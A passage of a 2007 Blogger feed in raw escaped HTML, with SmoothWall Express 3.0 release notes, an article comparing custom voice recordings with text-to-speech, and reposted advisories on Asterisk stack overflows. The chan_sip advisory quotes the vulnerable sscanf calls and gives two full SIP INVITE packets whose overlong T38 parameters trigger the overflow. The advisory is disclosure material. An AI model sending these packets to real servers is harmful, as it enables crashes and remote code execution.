control page.&lt;/li&gt;&lt;li&gt;Easier to use log viewers with Google-style pagination.&lt;/li&gt;&lt;/ul&gt;   &lt;p&gt;&lt;b&gt;Installing&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;The installer will automatically probe for and load SATA and SCSI drivers if no IDE disk is found.&lt;/p&gt;   &lt;p&gt;The old "media menu" has gone. While only CDROM installs are supported, it isn't needed anyway, but in the future it will not be needed anyway because the installer will know what type of install is required.&lt;/p&gt;   &lt;p&gt;To speed along the install, the ISDN, ADSL, and DHCP screens are not automatically presented. Instead a menu appears where these features can be configured.&lt;/p&gt;   &lt;p&gt;&lt;b&gt;IM proxy&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;3.0 incorporates an IM (Instant Messenger) proxy called &lt;a href="http://www.imspector.org/"&gt;IMSpector&lt;/a&gt; that is able to log and filter IM conversations in a variety of protocols including MSN, ICQ, AIM, Yahoo and IRC. This proxy also has an optional swear-word filter with a premade list of naughty words. The configuration page is under services; log viewer is under logs and is noteworthy because it shows conversations as they happen by using AJAX techniques to update the webpage.&lt;/p&gt;   &lt;p&gt;&lt;b&gt;Other notes&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;We've made a small change to the call-home process. It will now send back a dump of "lspci", "lsmod" and the USB device table. This was done so we could hopefully in the future build a compatibility matrix for smoothie from this data. Such a chart might even be useful to the Linux community as a whole as well.&lt;/p&gt;   &lt;p&gt;To enhance the security of the web interface, a password is now required to view the home page whereas previously this page was publicly viewable from the internal network. Any valid username (admin, dial, etc) will be able to view the home page.&lt;/p&gt;   &lt;p&gt;The traffic graphs page shows traffic stats for each interface, with current hour, current, day etc totals, as well as "real time" reports of traffic load on each interface. Note that this code was written for the commercial series of SmoothWall products, GPLd, and included in Express. We'd love to see this particular piece of software used in other projects as well.&lt;/p&gt;   &lt;p&gt;A new page, bandwidth bars, shows a continually updated representation of the bandwidth usage for each interface which is updated once a second through the use of AJAX and Javascript.&lt;/p&gt;   &lt;p&gt;The time server is enabled on the "time" screen under Preferences. The timeserver (based on openntpd) has been tested against linux (ntpd etc) and Windows and works well. The time server will service requests on the GREEN side only.&lt;/p&gt;   &lt;p&gt;The update mechanism has been reworked. In addition to the older "refresh updates list", download, upload and install mechanism, Express 3.0 has a semi automated installer. This will perform the actions of downloading and installing updates (in sequence) by use of a single update button. This should allow for much easier maintenance.&lt;/p&gt;   &lt;p&gt;&lt;b&gt;Feedback&lt;/b&gt;&lt;/p&gt;   &lt;p&gt;Please report all feedback, especially any problems encountered, to the &lt;a href="http://community.smoothwall.org/forum/"&gt;Community forum&lt;/a&gt; "Express 3.0 development".&lt;/p&gt;   &lt;p&gt; &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-119692552372814135?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/119692552372814135/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=119692552372814135' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/119692552372814135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/119692552372814135'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/smoothwall-express-3.html' title='SmoothWall Express 3'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-6078467309168643711</id><published>2007-09-19T09:28:00.001-07:00</published><updated>2007-09-19T09:28:37.242-07:00</updated><title type='text'>Pagina destacada</title><content type='html'>http://www.tmcnet.com/scripts/newsalerts/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-6078467309168643711?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/6078467309168643711/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=6078467309168643711' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6078467309168643711'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6078467309168643711'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/pagina-destacada.html' title='Pagina destacada'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-5511478055536160541</id><published>2007-09-19T07:35:00.000-07:00</published><updated>2007-09-19T09:25:19.390-07:00</updated><title type='text'>ersona to Persona - Custom Voice Recordings vs. Text To Speech &amp; More</title><content type='html'>&lt;span id="Template_ArticleTitle"&gt;&lt;/span&gt;&lt;div class="readarticle_articlebody"&gt;      &lt;div class="readarticle_separator"&gt; &lt;/div&gt;        &lt;table style="margin: 10px 0px;" cellpadding="0" cellspacing="0"&gt;      &lt;tbody&gt;&lt;tr&gt;       &lt;td class="readarticle_articlebody"&gt;       &lt;/td&gt;            &lt;/tr&gt;          &lt;/tbody&gt;&lt;/table&gt;    &lt;div class="readarticle_articlebody"&gt;      &lt;table style="margin: 10px 0px 0px;" cellpadding="0" cellspacing="0"&gt;    &lt;tbody&gt;&lt;tr&gt;     &lt;td class="readarticle_articlebody"&gt;When deploying a speech-enabled application, it's easy to see how your new media will improve productivity, decrease operating costs, increase revenues, enhance customer service satisfaction, and effectively manage your internal databases, but what will your system do for your "brand"? Successful speech-enabled applications create a "personality", or persona, that helps "brand" your offering. People develop opinions about the quality of your offering, and the credibility of your application, based on what they hear. When the only link between your application and your audience is a voice, having the right persona is critical. Companies spend millions of dollars on PR campaigns and marketing programs to build identity and promote their corporate image, but how many recognize the role persona will play in their speech-enabled application? The voice persona of your system will communicate, on your behalf, virtually every hour of every day to every client and prospect. Will it be a synthesized voice that sounds believable and sincere, maybe even happy; or a custom voice recording where the voice talent not only sounds happy, she was smiling too! So who will speak to your audience?&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Custom voice recordings&lt;/li&gt;&lt;li&gt;Text-To-Speech "synthesized" voice&lt;/li&gt;&lt;li&gt;Both custom voice recordings and TTS &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Custom voice recordings for telephony have come a long way since the early days of touch-tone based IVR systems. The need for a more "natural" interaction between the user and the application was created with the development of world class speech recognition applications from companies such as SpeechWorks, Nuance, and Philips. Instead of mechanical sounding "press 1, press 2 menus" and touch tone entries, the user uses their voice to "naturally" interact with the system. The success of any speech recognition application relies heavily on "natural" sounding dialogue, encouraging the same natural dialogue from the user, much like they were talking to a neighbor, or a friend… Now That's Persona! It's a comfortable interaction with someone you can relate to in some way, someone you trust. It is clear that voice persona can be directly linked to the success or failure of an entire application. So will it be a "real" person, or utterances made to sound like a "real" person? Custom voice recordings produced by professional voice talent increase user acceptance by creating a unique persona and contribute to the overall effectiveness of the user interface. For any given call or transaction, we want to the user to believe, at least once, that they are talking to a "real" person. This simply doesn't happen with TTS, not yet anyway. TTS has also come a long way, and FAST! Today's TTS voices are incredibly natural and can even portray emotion and emphasis when needed. As companies large and small move to speech-enable their business, TTS as a voice solution offers many attractive benefits including low cost, fast turnaround production of any phrase or sentence, no limit on the phrases than can be created, and voice consistency. Can a TTS voice really provide the right persona for your application? It depends on your specific application and the level of quality your audience expects. A TTS voice for your auto attendant or after-hours greeting, for example, would likely not have the persona necessary to enhance your corporate image. Also, custom auto attendant greetings can be mixed in the studio with "stingers" or sound identifiers that further build your brand. TTS is an amazing technology that will continue to grow and develop. We can expect to hear more lifelike interaction with TTS, more natural spoken dialogue, integrated emotions and emphasis, and because it is already working from text, more widespread integration with the Internet and various hand-held devices. Utilizing both custom voice recordings and TTS seems like the simple solution, right? Develop your persona and "brand" through custom voice recordings, then supplement database and other dynamic content with TTS. Not so fast! Many studies have shown that mixing custom voice recordings and TTS often results in an undesirable experience for the user. The overall persona of the system must be consistent or it becomes confusing. Wouldn't it would be annoying to interact with someone who always had someone else complete their sentences? The perception and retention of the message by the user becomes corrupt, furthermore the credibility of the application is greatly diminished. There are, however, some applications that successfully blend TTS and custom voice recordings. By careful integration of TTS only when necessary, these applications are able to enjoy the benefits of natural language dialogue a majority of the time, and use TTS as an added value for specific options, such as reading your e-mail. With a carefully crafted system and by matching the TTS voice with the custom voice, the interface is virtually seamless and the overall user experience is enhanced. Deploying a successful speech-enabled application requires a fun, easy to use interface, a voice persona that promotes your brand, and quality production. Although TTS is good and getting better, custom voice recordings cannot yet be replaced by complete synthesis. Even if TTS were perfect, where you couldn't tell the difference between synthesis and a custom voice recording, would your audience perceive the difference? Many professional voice talents and custom prompt recording studios are growing concerned that TTS will replace them. Some TTS companies seem to even promote this fact. Remember when the "drum machine" came out and it was going to replace every drummer in the world? To hear audio samples from RightVoice &lt;a href="http://www.speechtechmag.com/whitepapers/audiosamples.html"&gt;Click Here.&lt;/a&gt;  &lt;i&gt;Matt Right has been president and CEO of RightVoice.Net since its inception three years ago. RightVoice.Net is located in Atlanta, GA, and details about the company can be obtained from its web site: &lt;a href="http://www.rightvoice.net/"&gt;www.rightvoice.net&lt;/a&gt;.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;http://say.expressivo.com/&lt;br /&gt;http://www.wordtalk.co.uk/html/download.html&lt;br /&gt;http://www.nextup.com/neospeech.html&lt;br /&gt;http://www.talkforme.com/&lt;br /&gt;http://www.disc2.dk/tools/SGsurvey.html#intr&lt;br /&gt;http://www.texttospeechblog.com/&lt;br /&gt;http://www.haskins.yale.edu/tada_download/index.html&lt;br /&gt;http://www.speech.cs.cmu.edu/comp.speech/&lt;br /&gt;http://www.dmoz.org/Computers/Speech_Technology/Speech_Synthesis/&lt;br /&gt;http://itcansay.com/?page=reader&lt;br /&gt;http://support.microsoft.com/kb/306537/ES/&lt;br /&gt;http://support.microsoft.com/kb/306901/ES/&lt;br /&gt;http://support.microsoft.com/kb/E278927/ES/&lt;br /&gt;http://www.microsoft.com/speech/speech2007/default.mspx&lt;br /&gt;http://support.microsoft.com/kb/306902/ES/&lt;br /&gt;http://support.microsoft.com/kb/306899/ES/&lt;br /&gt;http://www.microsoft.com/windowsxp/using/accessibility/default.mspx#EKCAC&lt;br /&gt;http://www.microsoft.com/windowsxp/using/accessibility/narratorturnon.mspx&lt;br /&gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/SAPI51sr/Whitepapers/WP_XML_TTS_Tutorial.asp&lt;br /&gt;https://www.cepstral.com/downloads/&lt;br /&gt;http://en.wikipedia.org/wiki/List_of_screen_readers&lt;br /&gt;http://www.readplease.com&lt;br /&gt;http://trace.wisc.edu/world/computer_access/dos/dosshare.html#enable&lt;br /&gt;http://en.wikipedia.org/wiki/Festival_Speech_Synthesis_System&lt;br /&gt;http://en.wikipedia.org/wiki/Speech_synthesis&lt;br /&gt;http://en.wikipedia.org/wiki/Text_to_speech&lt;br /&gt;http://freetts.sourceforge.net/docs/index.php&lt;br /&gt;http://www.fon.hum.uva.nl/praat/&lt;br /&gt;http://www.kurzweiledu.com/downloads_kez3000.aspx&lt;br /&gt;http://en.wikipedia.org/wiki/Apple_PlainTalk&lt;br /&gt;http://www.bytecool.com/voices.htm&lt;br /&gt;http://www.loquendo.com/es/technology/TTS.htm&lt;br /&gt;http://www.w3.org/TR/voice-tts-reqs/&lt;br /&gt;http://www.freedownloadscenter.com/Best/msn-tts-voices.html&lt;br /&gt;http://www.nch.com.au/verbose/index.html&lt;br /&gt;http://sourceforge.net/projects/text2speech&lt;br /&gt;http://www.research.att.com/viewProject.cfm?prjID=315&lt;br /&gt;http://www.brothersoft.com/downloads/text-to-speech-voices.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-5511478055536160541?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/5511478055536160541/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=5511478055536160541' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5511478055536160541'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/5511478055536160541'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/ersona-to-persona-custom-voice.html' title='ersona to Persona - Custom Voice Recordings vs. Text To Speech &amp; More'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-9209175074431773316</id><published>2007-09-18T11:19:00.002-07:00</published><updated>2007-09-18T11:20:50.310-07:00</updated><title type='text'>Multiple Unauthenticated Stack Overflows in Asterisk Chan_sip.c (STP)</title><content type='html'>tomado de http://www.securiteam.com/unixfocus/5GP011FM0C.html&lt;br /&gt;&lt;table id="ArticleTABLE" style="width: 100%;" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table id="ArticleTitle" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="header" style="font-size: 150%;" width="80%"&gt;Multiple Unauthenticated Stack Overflows in Asterisk Chan_sip.c (STP)&lt;/td&gt;           &lt;td class="header" style="text-align: right;"&gt;5 Jul. 2007&lt;/td&gt;          &lt;/tr&gt;         &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Summary&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;excerpt&gt;Two closely related stack based buffer overflows exist in the SIP/SDP handler of Asterisk, the vulnerabilities are very similar but exist as two separate unsafe function calls&lt;/excerpt&gt;. The T38FaxRateManagement and T38FaxUdpEC SDP parameters can be exploited remotely leading to arbitrary code execution without authentication. In order for these overflows to occur, t38 fax over SIP must be enabled in sip.conf.&lt;br /&gt;&lt;br /&gt;Examples of SIP INVITE packets are shown in the details section, however these vulnerabilities can be triggered with a number of different SIP messages affecting calls received by Asterisk, or in response to calls made by Asterisk.&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;b&gt;Credit:&lt;/b&gt;&lt;br /&gt;       The information has been provided by &lt;a href="mailto:barrie%20at%20ngssoftware.com"&gt;Barrie Dempster&lt;/a&gt;.  &lt;br /&gt; &lt;br /&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Details&lt;/td&gt;       &lt;/tr&gt;       &lt;tr align="left"&gt;        &lt;td&gt;      &lt;div style="border: 1px solid rgb(153, 153, 153); padding: 1em; float: right; width: 300px; height: 4em; margin-left: 1em; margin-bottom: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/avds20070503"&gt;What if you could scan your network for all the vulnerabilities on SecuriTeam.com, automatically, every day?&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;      &lt;b&gt;Vulnerable Systems:&lt;/b&gt;&lt;br /&gt; * Asterisk versions prior to 1.4.3&lt;br /&gt; * AsteriskNOW versions prior to Beta6&lt;br /&gt; * Asterisk Appliance Developers Kits versions prior to 0.4.0&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxRateManagement parameter&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;A remote unauthenticated stack overflow exists in the SIP/SDP handler of Asterisk. By sending a SIP packet with SDP data which includes an overly long T38 parameter it is possible to overflow a stack based buffer and execute arbitrary code.&lt;br /&gt;&lt;br /&gt;The process_sdp function of chan_sip.c in Asterisk contains the following vulnerable call to sscanf.&lt;br /&gt;&lt;br /&gt;else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {&lt;br /&gt;                                found = 1;&lt;br /&gt;                                if (option_debug &gt; 2)&lt;br /&gt;&lt;br /&gt;ast_log(LOG_DEBUG, "RateMangement: %s\n", s);&lt;br /&gt;                                if (!strcasecmp(s, "localTCF"))&lt;br /&gt;                                        peert38capability |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;&lt;br /&gt;                                else if (!strcasecmp(s, "transferredTCF"))&lt;br /&gt;                                        peert38capability |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;&lt;br /&gt;&lt;br /&gt;This attempts to read the "T38FaxRateManagement:" option from the SDP within a SIP packet and copy the succeeding string into "s". There are no checks on the length of this string and we can therefore write past the boundaries of the "s" variable overwriting adjacent memory on the stack. "s" is defined earlier in this function as being a character array of only 256 bytes.&lt;br /&gt;&lt;br /&gt;The following example packet demonstrates an overflow of this parameter:&lt;br /&gt;&lt;i&gt;INVITE sip:200@127.0.0.1 SIP/2.0&lt;br /&gt;Date: Wed, 21 Mar 2007 4:20:09 GMT&lt;br /&gt;CSeq: 1 INVITE&lt;br /&gt;Via: SIP/2.0/UDP&lt;br /&gt;10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport&lt;br /&gt;User-Agent: NGS/2.0&lt;br /&gt;From: "Barrie Dempster"&lt;br /&gt;&lt;sip:zeedo@10.0.0.123:5068&gt;;tag=de92d852-2dd6-db11-9d02-000b7d0dc672&lt;br /&gt;Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades&lt;br /&gt;To: &lt;sip:200@localhost&gt;&lt;br /&gt;Contact: &lt;sip:zeedo@10.0.0.123:5068;transport=udp&gt;&lt;br /&gt;Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE&lt;br /&gt;Content-Type: application/sdp&lt;br /&gt;Content-Length: 796&lt;br /&gt;Max-Forwards: 70&lt;br /&gt;&lt;br /&gt;v=0&lt;br /&gt;o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1&lt;br /&gt;s=-&lt;br /&gt;c=IN IP4 127.0.0.1&lt;br /&gt;t=0 0&lt;br /&gt;m=image 5004 UDPTL t38&lt;br /&gt;a=T38FaxVersion:0&lt;br /&gt;a=T38MaxBitRate:14400&lt;br /&gt;a=T38FaxMaxBuffer:1024&lt;br /&gt;a=T38FaxMaxDatagram:238&lt;br /&gt;a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;a=T38FaxUdpEC:t38UDPRedundancy&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC parameter&lt;/b&gt;&lt;br /&gt;A remote unauthenticated stack overflow exists in the SIP/SDP handler of Asterisk. By sending a SIP packet with SDP data which includes an overly long T38FaxUdpEC parameter it is possible to overflow a stack based buffer and execute arbitrary code.&lt;br /&gt;&lt;br /&gt;The process_sdp function of chan_sip.c in Asterisk contains the following vulnerable call to sscanf.&lt;br /&gt;&lt;br /&gt;&lt;i&gt;else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {&lt;br /&gt;                                found = 1;&lt;br /&gt;                                if (option_debug &gt; 2)&lt;br /&gt;                                        ast_log(LOG_DEBUG, "UDP EC: %s\n", s);&lt;br /&gt;                                if (!strcasecmp(s, "t38UDPRedundancy")) {&lt;br /&gt;                                        peert38capability |= T38FAX_UDP_EC_REDUNDANCY;&lt;br /&gt;&lt;br /&gt;ast_udptl_set_error_correction_scheme(p-&gt;udptl, UDPTL_ERROR_CORRECTION_REDUNDANCY);&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;This attempts to read the "T38FaxUdpEC:" option from the SDP within a SIP packet and copy the succeeding string into "s". There are no checks on the length of this string and we can therefore write past the boundaries of the "s" variable overwriting adjacent memory on the stack. "s" is defined earlier in this function as being a character array of only 256 bytes.&lt;br /&gt;&lt;br /&gt;The following example packet demonstrates an overflow of this parameter:&lt;br /&gt;&lt;i&gt;INVITE sip:200@127.0.0.1 SIP/2.0&lt;br /&gt;Date: Wed, 21 Mar 2007 4:20:09 GMT&lt;br /&gt;CSeq: 1 INVITE&lt;br /&gt;Via: SIP/2.0/UDP&lt;br /&gt;10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport&lt;br /&gt;User-Agent: NGS/2.0&lt;br /&gt;From: "Barrie Dempster"&lt;br /&gt;&lt;sip:zeedo@10.0.0.123:5068&gt;;tag=de92d852-2dd6-db11-9d02-000b7d0dc672&lt;br /&gt;Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades&lt;br /&gt;To: &lt;sip:200@localhost&gt;&lt;br /&gt;Contact: &lt;sip:zeedo@10.0.0.123:5068;transport=udp&gt;&lt;br /&gt;Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE&lt;br /&gt;Content-Type: application/sdp&lt;br /&gt;Content-Length: 796&lt;br /&gt;Max-Forwards: 70&lt;br /&gt;&lt;br /&gt;v=0&lt;br /&gt;o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1&lt;br /&gt;s=-&lt;br /&gt;c=IN IP4 127.0.0.1&lt;br /&gt;t=0 0&lt;br /&gt;m=image 5004 UDPTL t38&lt;br /&gt;a=T38FaxVersion:0&lt;br /&gt;a=T38MaxBitRate:14400&lt;br /&gt;a=T38FaxMaxBuffer:1024&lt;br /&gt;a=T38FaxMaxDatagram:238&lt;br /&gt;a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Fix Information:&lt;/b&gt;&lt;br /&gt;Updated packages for:&lt;br /&gt;Asterisk can be found on &lt;a href="http://www.asterisk.org/"&gt;http://www.asterisk.org&lt;/a&gt;&lt;br /&gt;AsteriskNOW can be found on &lt;a href="http://www.asterisknow.org/"&gt;http://www.asterisknow.org&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-9209175074431773316?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/9209175074431773316/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=9209175074431773316' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9209175074431773316'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/9209175074431773316'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/multiple-unauthenticated-stack.html' title='Multiple Unauthenticated Stack Overflows in Asterisk Chan_sip.c (STP)'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-6197170141333437181</id><published>2007-09-18T11:19:00.001-07:00</published><updated>2007-09-18T11:19:49.671-07:00</updated><title type='text'>Stack Buffer Overflow in Asterisk's IAX2 Channel Driver</title><content type='html'>&lt;table id="ArticleTABLE" style="width: 100%;" border="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;table id="ArticleTitle" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="header" style="font-size: 150%;" width="80%"&gt;Tomado de http://www.securiteam.com/securitynews/5HP0F2KM0A.html&lt;br /&gt;&lt;br /&gt;Stack Buffer Overflow in Asterisk's IAX2 Channel Driver&lt;/td&gt;           &lt;td class="header" style="text-align: right;"&gt;19 Jul. 2007&lt;/td&gt;          &lt;/tr&gt;         &lt;/tbody&gt;&lt;/table&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: rgb(255, 255, 255);"&gt; Summary&lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;excerpt&gt;The Asterisk IAX2 channel driver, chan_iax2, has a remotely exploitable stack buffer overflow vulnerability&lt;/excerpt&gt;. It occurs when chan_iax2 is passed a voice or video frame with a data payload larger than 4 kB. This is exploitable by sending a very large RTP frame to an active RTP port number used by Asterisk when the other end of the call is an IAX2 channel. Exploiting this issue can cause a crash or allow arbitrary code execution on a remote machine.&lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;              &lt;tr align="left"&gt;        &lt;td&gt;&lt;b&gt;Credit:&lt;/b&gt;&lt;br /&gt;       The information has been provided by &lt;a href="mailto:russell%20at%20digium.com"&gt;Russell Bryant&lt;/a&gt;.&lt;br /&gt;The original article can be found at: &lt;a href="http://ftp.digium.com/pub/asa/ASA-2007-014.pdf"&gt;http://ftp.digium.com/pub/asa/ASA-2007-014.pdf&lt;/a&gt;  &lt;br /&gt; &lt;br /&gt;        &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td&gt; &lt;/td&gt;       &lt;/tr&gt;       &lt;tr&gt;        &lt;td class="header" style="background: rgb(138, 140, 226) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; color: 